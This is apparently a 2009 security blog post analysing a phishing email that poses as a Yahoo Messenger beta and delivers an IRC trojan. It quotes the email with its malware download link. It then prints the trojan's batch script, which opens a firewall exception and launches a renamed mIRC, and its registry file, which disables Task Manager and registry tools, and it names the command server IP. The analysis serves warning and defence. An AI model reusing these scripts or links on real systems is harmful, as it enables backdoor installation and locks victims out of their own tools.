Blog for hpHosts, and whatever else I feel like writing about ....

Friday, 24 April 2009

Email Alert: IRC Trojan disguised as Yahoo Messenger Beta 9.4

I received the following e-mail a few minutes ago;

Yahoo! Messenger <http://messenger.yahoo.com>

Preview the new
Yahoo! Messenger for Vista™


The new messenger Vista 9.3 now works on Windows XP too. Download Now <http://117.34.79.142/.1/Yahoo_Messenger_9.4_Beta.exe>

Sign up for the Yahoo! Messenger for Vista Group for the latest news and updates! Join Now <http://new.groups.yahoo.com/ymessenger_for_vista/join>

We need your help to improve the product.
» Send feedback <http://feedback.help.yahoo.com/feedback.php?.src=MSNGRVISTA&.from=web>
See Yahoo! Messenger for Vista in action.
» Watch the video preview

Note: While testing this product, you can still use your current version of Yahoo! Messenger (8.1 or 9.0).

See what's in store...

* Skins
* Sidebar Gadget
* Tabs
* Contact Scaling

©2007 Microsoft Corporation. Windows Vista is either a registered trademark or trademark of Microsoft Corporation in the United States and/or other countries.

Copyright © 2008 Yahoo! Inc. <http://us.ard.yahoo.com/SIG=14tuhfkju/M=224039.2026165.3499947.1964914/D=pager/S=97751562:FOOT/Y=YAHOO/EXP=1208196992/L=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S/B=yUjjD9j8a4Q-/J=1208189792481248/A=1058397/R=0/SIG=10np9vmbm/*http://www.yahoo.com/> All rights reserved. Privacy Policy <http://us.ard.yahoo.com/SIG=14tuhfkju/M=224039.2026165.3499947.1964914/D=pager/S=97751562:FOOT/Y=YAHOO/EXP=1208196992/L=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S/B=yUjjD9j8a4Q-/J=1208189792481248/A=1058397/R=1/SIG=11b8diacl/*http://privacy.yahoo.com/privacy/us/mesg/> - Terms of Service <http://us.ard.yahoo.com/SIG=14tuhfkju/M=224039.2026165.3499947.1964914/D=pager/S=97751562:FOOT/Y=YAHOO/EXP=1208196992/L=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S/B=yUjjD9j8a4Q-/J=1208189792481248/A=1058397/R=2/SIG=1136qnvkg/*http://docs.yahoo.com/info/terms/> - Copyright/IP Policy <http://us.ard.yahoo.com/SIG=14t> - Help <http://us.ard.yahoo.com/SIG=14tuhfkju/M=224039.2026165.3499947.1964914/D=pager/S=97751562:FOOT/Y=YAHOO/EXP=1208196992/L=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S/B=yUjjD9j8a4Q-/J=1208189792481248/A=1058397/R=4/SIG=119174mfa/*http://help.yahoo.com/help/us/messenger>
<http://us.bc.yahoo.com/b?P=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S&T=13ulcavcq%2fX%3d1208189792%2fE%3d97751562%2fR%3dpager%2fK%3d5%2fV%3d2.1%2fW%3dH%2fY%3dYAHOO%2fF%3d431143132%2fQ%3d-1%2fS%3d1%2fJ%3d1B6BFCD8&U=129gtep8a%2fN%3dy0jjD9j8a4Q-%2fC%3d-1%2fD%3dFSRVY%2fB%3d-1>
<http://us.bc.yahoo.com/b?P=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S&T=13upbop04%2fX%3d1208189792%2fE%3d97751562%2fR%3dpager%2fK%3d5%2fV%3d2.1%2fW%3dH%2fY%3dYAHOO%2fF%3d671435333%2fQ%3d-1%2fS%3d1%2fJ%3d1B6BFCD8&U=139fpoc2d%2fN%3dyUjjD9j8a4Q-%2fC%3d224039.2026165.3499947.1964914%2fD%3dFOOT%2fB%3d1058397>


The link it points to for the download;

hxxp://117.34.79.142/.1/Yahoo_Messenger_9.4_Beta.exe

.. leads to an IP in China. If we scan the file with VirusTotal, we see it's an IRC trojan.

http://www.virustotal.com/analisis/a9e91000bd66003d3871e28c92b51a3b

Extracting the file, shows it claiming to be a .DLL by the name of fp721ext.dll. This DLL however, is actually a folder, and contains the files shown in the following screenshot;



As you can see, there are quite a few in there. mIRC itself, a legit IRC client, has been renamed mircrosoft.exe. The folder also contains a file called csc.cmd. Amongst other things, this adds an exception to the Windows firewall, to allow mircrosoft.exe to connect without warning you, to the attackers IRC channel;

@echo off

@START C:\WINDOWS\system32\Setup\fp721ext.dll\anyssya.jpg

@regedit /s "C:\WINDOWS\system32\Setup\fp721ext.dll\regis.reg"

@cmd /c netsh firewall add allowedprogram C:\WINDOWS\system32\Setup\fp721ext.dll\mircrosoft.exe MicrosoftODBLL ENABLE

@START /B C:\WINDOWS\system32\Setup\fp721ext.dll\mircrosoft.exe

EXIT


regis.reg contains the following;

REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:0000000a

[HKEY_CURRENT_USER\Software\mIRC\LastRun]
@="1201460626,0"

[HKEY_CURRENT_USER\Software\mIRC\License]
@="17904-1848536"

[HKEY_CURRENT_USER\Software\mIRC\LockOptions]
@="0,4096"

[HKEY_CURRENT_USER\Software\mIRC\UserName]
@="dog@compustress.com"

[HKEY_CURRENT_USER\Software\mIRC\Validated]
@="17904-1848536"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=hex:91,00,00,00
"ClearRecentDocsOnExit"=hex:01,00,00,00
"NoTrayItemsDisplay"=dword:00000001


anyssya.jpg actually is a JPG file, and it's detection at VT is non-existent. However, since it's also loaded by the csc.cmd file, I'm betting it's a little more than it seems.

The infection, judging by the .ini files, seems to connect to 89.35.207.106 (client-8935207106.raknetsoft.ro).

I'll post further analysis once complete. In the meantime, the e-mail itself originated from 66.51.252.238 (Velcom (ADSL) NET-VELCOM-DSL-1) and had the following properties;

From: Yahoo! Vista
E-mail:vista-yahoo.com@trixbox1.localdomain [ - Invalid IP was passed to me ]
Date: 25/04/2009 02:20:45
Subject: The New Messenger Vista For Xp !

No comments: